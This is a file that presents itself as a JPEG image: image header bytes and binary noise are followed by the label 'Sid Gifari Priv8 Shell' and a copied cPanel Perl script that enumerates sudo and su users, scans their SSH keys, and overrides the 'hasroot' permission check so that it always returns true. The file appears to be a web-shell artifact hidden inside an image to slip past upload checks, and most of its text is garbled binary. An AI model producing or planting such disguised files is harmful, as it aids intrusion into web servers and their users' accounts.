���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��Sid Gifari Priv8 Shell #!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/updatesupportauthorizations Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use strict; use Cpanel::SSH (); use Cpanel::Sys::Escalate (); use Whostmgr::ACLS (); use Whostmgr::TicketSupport::DataStore (); # verify we're root # die 'You must run this script as root!' if $> != 0; # we need to override these for this to work # sub hasfeature { return 1; } no warnings 'redefine'; local *Whostmgr::ACLS::hasroot = sub { return 1; }; # load and seed the storable with a sane list of users # my $ds = Whostmgr::TicketSupport::DataStore->new(); print "Enumerating all the su and sudo users on the system...\n"; # figure out all the users to search (THIS IS VERY INEFFECIENT BECAUSE USERS MUST BE IN-ORDER!!!) # my @users = ('root'); { my $sudo_users = Cpanel::Sys::Escalate::get_list_of_sudo_users(); push @users, grep { my $sudo_user = $_; !grep { $_ eq $sudo_user } @users } @{$sudo_users}; } { my $su_users = Cpanel::Sys::Escalate::get_list_of_su_users(); push @users, grep { my $su_user = $_; !grep { $_ eq $su_user } @users } @{$su_users}; } print "Scanning home directories for recognized cPanel Support SSH public keys...\n"; # enumerate and rebuild the cached list of users # my ( %checked_homedirs, @users_detected ); foreach my $user (@users) { # prevent checking duplicate users # my $user_homedir = Cpanel::SSH::_getsshdir( $user, { skip_create => 1 } ); next if !$user_homedir || defined $checked_homedirs{$user_homedir} || !-d $user_homedir; $checked_homedirs{$user_homedir} = 1; # find all relevant keys # my ( $keys, $warnings ) = Cpanel::SSH::_listkeys( 'user' => $user, 'private' => 0, 'public' => 1 ); foreach my $key ( @{$keys} ) { # make sure we can parse the key text # next if $key->{'text'} !~ m/\s+(\w{3,64})_server_(\w{1,64})\@cpanel.net_\d+/; # add to our list... # push @users_detected, $user; # we only need one key match # last; } } print "Writing out the support authorizations users cache...\n"; # ONLY update the list of users # $ds->set( 'users', \@users_detected ); # write and we're done # $ds->cleanup(); print "Done!\n";